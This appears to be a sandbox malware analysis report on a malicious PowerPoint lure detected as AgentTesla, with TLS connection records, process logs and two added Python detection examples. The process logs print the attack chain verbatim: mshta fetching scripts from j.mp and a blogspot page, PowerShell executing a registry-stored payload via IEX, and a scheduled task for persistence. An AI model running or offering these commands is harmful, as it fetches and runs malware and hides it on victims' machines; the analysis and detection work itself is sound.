                                                                                                                                                                                                            Jan 13, 2021 13:44:47.191617966 CET108.177.127.132443192.168.2.2249188CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.516547918 CET108.177.127.132443192.168.2.2249192CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.705315113 CET172.67.219.133443192.168.2.2249193CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.462819099 CET108.177.127.132443192.168.2.2249200CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.794524908 CET104.18.49.20443192.168.2.2249206CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.267565012 CET108.177.127.132443192.168.2.2249208CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
(continuation of the preceding row) Intermediate: CN=GTS CA 1O1, O=Google Trust Services, C=US, issued by CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2; valid Thu Jun 15 02:00:42 CEST 2017 to Wed Dec 15 01:00:42 CET 2021

Jan 13, 2021 13:45:26.734380960 CET, server 104.18.49.20:443, client 192.168.2.22:49210
  Leaf: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US, issued by CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; valid Thu Aug 06 02:00:00 CEST 2020 to Fri Aug 06 14:00:00 CEST 2021
  Intermediate: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US, issued by CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE; valid Mon Jan 27 13:48:08 CET 2020 to Wed Jan 01 00:59:59 CET 2025
  JA3 SSL client fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
  JA3 SSL client digest: 05af1f5ca1b87cc9cc9b25185115607d

Jan 13, 2021 13:45:32.833523989 CET, server 108.177.127.132:443, client 192.168.2.22:49213
  Leaf: CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US, issued by CN=GTS CA 1O1, O=Google Trust Services, C=US; valid Tue Dec 15 15:45:09 CET 2020 to Tue Mar 09 15:45:08 CET 2021
  Intermediate: CN=GTS CA 1O1, O=Google Trust Services, C=US, issued by CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2; valid Thu Jun 15 02:00:42 CEST 2017 to Wed Dec 15 01:00:42 CET 2021
  JA3 SSL client fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
  JA3 SSL client digest: 7dcce5b76c8b17472d024758970a406b

Jan 13, 2021 13:45:41.377978086 CET, server 108.177.127.132:443, client 192.168.2.22:49215
  Leaf: CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US, issued by CN=GTS CA 1O1, O=Google Trust Services, C=US; valid Tue Dec 15 15:45:09 CET 2020 to Tue Mar 09 15:45:08 CET 2021
  Intermediate: CN=GTS CA 1O1, O=Google Trust Services, C=US, issued by CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2; valid Thu Jun 15 02:00:42 CEST 2017 to Wed Dec 15 01:00:42 CET 2021
  JA3 SSL client fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
  JA3 SSL client digest: 7dcce5b76c8b17472d024758970a406b
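The last two values of each TLS row are the JA3 client fingerprint (ClientHello version, cipher suites, extension types, supported groups, point formats) and its MD5 digest. The Cloudflare-fronted connection at 13:45:26 and the two blogspot.com connections carry different fingerprints, so they were made by two differently configured TLS client stacks. As an added example that is not part of the sandbox report, the Python below serialises a ClientHello body from the report's own fingerprint strings, parses it back into the JA3 string while discarding GREASE values the way JA3 requires, and computes the digest column from the fingerprint column. The builder fills every extension other than supported_groups and ec_point_formats with an empty body; that is an assumption that only matters for fingerprinting, since JA3 looks at extension types and order, not contents.

```python
"""Round-trip the JA3 fingerprints from the report through a synthetic ClientHello.
Added example, not code from the Joe Sandbox report."""
import hashlib
import os
import struct

# JA3 SSL client fingerprints copied from the TLS rows of this report.
CLOUDFLARE_JA3 = "769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0"
BLOGSPOT_JA3 = ("771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-"
                "49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0")

EXT_SUPPORTED_GROUPS = 10
EXT_EC_POINT_FORMATS = 11


def is_grease(value: int) -> bool:
    """GREASE values (RFC 8701) are 0x0A0A, 0x1A1A, ... 0xFAFA; JA3 drops them."""
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def _ints(field: str) -> list:
    return [int(x) for x in field.split("-")] if field else []


def _u16_list(values: list) -> bytes:
    return b"".join(struct.pack(">H", v) for v in values)


def build_client_hello(ja3: str, grease: bool = False) -> bytes:
    """Serialise a ClientHello handshake body (no record/handshake header) from a JA3 string.
    With grease=True, GREASE entries are injected the way modern browsers do, to show
    that the parser ignores them.  Assumption: extensions other than groups/formats are empty."""
    version, ciphers, exts, curves, fmts = ja3.split(",")
    cipher_list, ext_list = _ints(ciphers), _ints(exts)
    curve_list, fmt_list = _ints(curves), _ints(fmts)
    if grease:
        cipher_list = [0x0A0A] + cipher_list
        ext_list = [0x1A1A] + ext_list
        curve_list = [0x2A2A] + curve_list
    body = struct.pack(">H", int(version)) + os.urandom(32) + b"\x00"  # version, random, empty session id
    body += struct.pack(">H", 2 * len(cipher_list)) + _u16_list(cipher_list)
    body += b"\x01\x00"  # one compression method: null
    ext_bytes = b""
    for ext in ext_list:
        if ext == EXT_SUPPORTED_GROUPS:
            data = struct.pack(">H", 2 * len(curve_list)) + _u16_list(curve_list)
        elif ext == EXT_EC_POINT_FORMATS:
            data = bytes([len(fmt_list)]) + bytes(fmt_list)
        else:
            data = b""
        ext_bytes += struct.pack(">HH", ext, len(data)) + data
    return body + struct.pack(">H", len(ext_bytes)) + ext_bytes


def ja3_from_client_hello(body: bytes) -> str:
    """Parse a ClientHello body into its JA3 string, GREASE removed from every list."""
    pos = 0
    version = struct.unpack_from(">H", body, pos)[0]
    pos += 2 + 32                       # version, random
    pos += 1 + body[pos]                # session id
    cs_len = struct.unpack_from(">H", body, pos)[0]
    pos += 2
    ciphers = [c for (c,) in struct.iter_unpack(">H", body[pos:pos + cs_len])]
    pos += cs_len
    pos += 1 + body[pos]                # compression methods
    exts, curves, fmts = [], [], []
    if pos < len(body):
        end = pos + 2 + struct.unpack_from(">H", body, pos)[0]
        pos += 2
        while pos < end:
            etype, elen = struct.unpack_from(">HH", body, pos)
            pos += 4
            data = body[pos:pos + elen]
            pos += elen
            exts.append(etype)
            if etype == EXT_SUPPORTED_GROUPS:
                n = struct.unpack_from(">H", data, 0)[0]
                curves = [c for (c,) in struct.iter_unpack(">H", data[2:2 + n])]
            elif etype == EXT_EC_POINT_FORMATS:
                fmts = list(data[1:1 + data[0]])

    def join(values):
        return "-".join(str(v) for v in values if not is_grease(v))

    return ",".join([str(version), join(ciphers), join(exts), join(curves), join(fmts)])


def ja3_digest(ja3: str) -> str:
    """The 'JA3 SSL Client Digest' column is the MD5 of the fingerprint string."""
    return hashlib.md5(ja3.encode()).hexdigest()


if __name__ == "__main__":
    for name, fp in (("cloudflare", CLOUDFLARE_JA3), ("blogspot", BLOGSPOT_JA3)):
        hello = build_client_hello(fp, grease=True)
        print(name, ja3_from_client_hello(hello) == fp, ja3_digest(fp))
```

Version 769 is a TLS 1.0 ClientHello with fourteen cipher suites, whereas the blogspot.com connections use 771 (TLS 1.2) and a much larger suite list; when hunting, pivot on the digest, not the SNI, because both rows here terminate at shared-hosting certificates (sni.cloudflaressl.com, misc-sni.blogspot.com) that say nothing about the tenant.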

                                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:43:35
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
                                                                                                                                                                                                            Imagebase:0x13f660000
                                                                                                                                                                                                            File size:2163560 bytes
                                                                                                                                                                                                            MD5 hash:EBBBEF2CCA67822395E24D6E18A3BDF6
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:43:38
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
                                                                                                                                                                                                            Imagebase:0x49ff0000
                                                                                                                                                                                                            File size:302592 bytes
                                                                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:43:39
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
                                                                                                                                                                                                            Imagebase:0x13f020000
                                                                                                                                                                                                            File size:2163560 bytes
                                                                                                                                                                                                            MD5 hash:EBBBEF2CCA67822395E24D6E18A3BDF6
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:33
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:ping.exe
                                                                                                                                                                                                            Imagebase:0xffea0000
                                                                                                                                                                                                            File size:16896 bytes
                                                                                                                                                                                                            MD5 hash:5FB30FE90736C7FC77DE637021B1CE7C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:33
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:34
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:ping.exe
                                                                                                                                                                                                            Imagebase:0xff5d0000
                                                                                                                                                                                                            File size:16896 bytes
                                                                                                                                                                                                            MD5 hash:5FB30FE90736C7FC77DE637021B1CE7C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:37
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
                                                                                                                                                                                                            Imagebase:0x21ac0000
                                                                                                                                                                                                            File size:452608 bytes
                                                                                                                                                                                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:38
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
                                                                                                                                                                                                            Imagebase:0xff140000
                                                                                                                                                                                                            File size:285696 bytes
                                                                                                                                                                                                            MD5 hash:97E0EC3D6D99E8CC2B17EF2D3760E8FC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:40
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\taskeng.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                                                                                                                            Imagebase:0xffa70000
                                                                                                                                                                                                            File size:464384 bytes
                                                                                                                                                                                                            MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
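Read together, the command lines above record the whole chain: PowerPoint opens the .ppt, mshta pulls a script from j.mp behind a userinfo prefix (everything before the "@" is credentials, the host actually contacted is j.mp), PowerShell evaluates the registry value meather under HKCU:\Software with IEX, and schtasks registers a task named lunkicharkhi that re-launches mshta vbscript: every 80 minutes. As an added example that is not part of the Joe Sandbox report, the Python below parses Path/Commandline pairs in the layout of these records (copied here as constructed sample input, with the report's nested-quote escaping simplified) and applies three command-line rules. The rule names and the shortener list are this example's own assumptions; the records carry no parent PID, so Office-spawns-shell logic is deliberately left out.

```python
"""Command-line triage for the mshta / PowerShell / schtasks chain seen in this report.
Added example, not part of the Joe Sandbox report."""
import re
from urllib.parse import urlsplit

# Constructed sample: Path/Commandline pairs copied from the process records above,
# one blank line between processes; the report's '' / \' quote escaping is simplified.
SAMPLE_RECORDS = r"""
Path:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Commandline:'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'

Path:C:\Windows\System32\mshta.exe
Commandline:mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv

Path:C:\Windows\System32\PING.EXE
Commandline:ping.exe

Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX

Path:C:\Windows\System32\schtasks.exe
Commandline:'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''mshta vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')''

Path:C:\Windows\System32\mshta.exe
Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
"""

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
SHORTENERS = {"j.mp", "bit.ly", "tinyurl.com"}  # assumption: seed list, extend from your own intel


def parse_records(text: str) -> list:
    """Split blank-line separated Key:Value blocks into one dict per process."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            rec[key.strip().lower()] = value.strip()
        records.append(rec)
    return records


def rule_mshta(cmd: str) -> list:
    """mshta given a URL: flag the host, a userinfo prefix, a shortener, or inline vbscript:."""
    hits = []
    if not re.search(r"\bmshta(\.exe)?\b", cmd, re.I):
        return hits
    for url in URL_RE.findall(cmd):
        parts = urlsplit(url)
        host = parts.hostname or ""
        hits.append(("mshta_remote_url", host))
        if parts.username is not None:
            # RFC 3986: 'userinfo@host' - the part before '@' is a credential, not the host
            hits.append(("url_userinfo_obfuscation", f"userinfo={parts.username!r} host={host}"))
        if host in SHORTENERS:
            hits.append(("url_shortener", host))
    if "vbscript:" in cmd.lower():
        hits.append(("mshta_inline_vbscript", cmd.lower().split("vbscript:", 1)[1][:40]))
    return hits


def rule_powershell(cmd: str) -> list:
    """PowerShell piping a registry value into IEX: the payload lives in the registry, not on disk."""
    hits = []
    if not re.search(r"powershell", cmd, re.I) or not re.search(r"\b(iex|invoke-expression)\b", cmd, re.I):
        return hits
    m = re.search(r"\(\s*(?:gp|get-itemproperty)\s+([^\s)]+)\s*\)\s*\.\s*(\w+)", cmd, re.I)
    if m:
        hits.append(("registry_stored_payload", f"{m.group(1)}!{m.group(2)}"))
    else:
        hits.append(("iex_in_commandline", cmd[:60]))
    return hits


def rule_schtasks(cmd: str) -> list:
    """schtasks /create whose /tr action runs mshta: LOLBin persistence on a repeat interval."""
    hits = []
    if not re.search(r"schtasks", cmd, re.I) or "/create" not in cmd.lower():
        return hits
    action = re.search(r"/tr\s+(.*)$", cmd, re.I | re.S)
    if not (action and re.search(r"\bmshta\b", action.group(1), re.I)):
        return hits
    name = re.search(r"/tn\s+'*([^'\s]+)", cmd, re.I)
    sched = re.search(r"/sc\s+(\w+)(?:\s+/mo\s+(\d+))?", cmd, re.I)
    task = name.group(1) if name else "?"
    interval = f"{sched.group(2) or '1'} {sched.group(1)}" if sched else "?"
    hits.append(("schtasks_mshta_persistence", f"task={task} interval={interval}"))
    return hits


RULES = (rule_mshta, rule_powershell, rule_schtasks)


def triage(report_text: str) -> dict:
    """Return {path: [(rule, detail), ...]} for every process record that trips a rule."""
    findings = {}
    for rec in parse_records(report_text):
        hits = [h for rule in RULES for h in rule(rec.get("commandline", ""))]
        if hits:
            findings.setdefault(rec.get("path", "?"), []).extend(hits)
    return findings


if __name__ == "__main__":
    for path, hits in triage(SAMPLE_RECORDS).items():
        print(path)
        for rule, detail in hits:
            print(f"  [{rule}] {detail}")
```

The registry rule is the one to keep even after the C2 hosts rotate: a payload stored as a value under HKCU:\Software and executed with `IEX` never touches disk, so an AV file scan finds nothing, while the command line `(gp HKCU:\...).name | IEX` is stable across this family's samples.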

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:40
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:42
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:43
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
                                                                                                                                                                                                            Imagebase:0x4ab60000
                                                                                                                                                                                                            File size:345088 bytes
                                                                                                                                                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:46
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close')
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:46
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:taskkill /f /im winword.exe
                                                                                                                                                                                                            Imagebase:0xff4f0000
                                                                                                                                                                                                            File size:112640 bytes
                                                                                                                                                                                                            MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:47
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
                                                                                                                                                                                                            Imagebase:0x21ac0000
                                                                                                                                                                                                            File size:452608 bytes
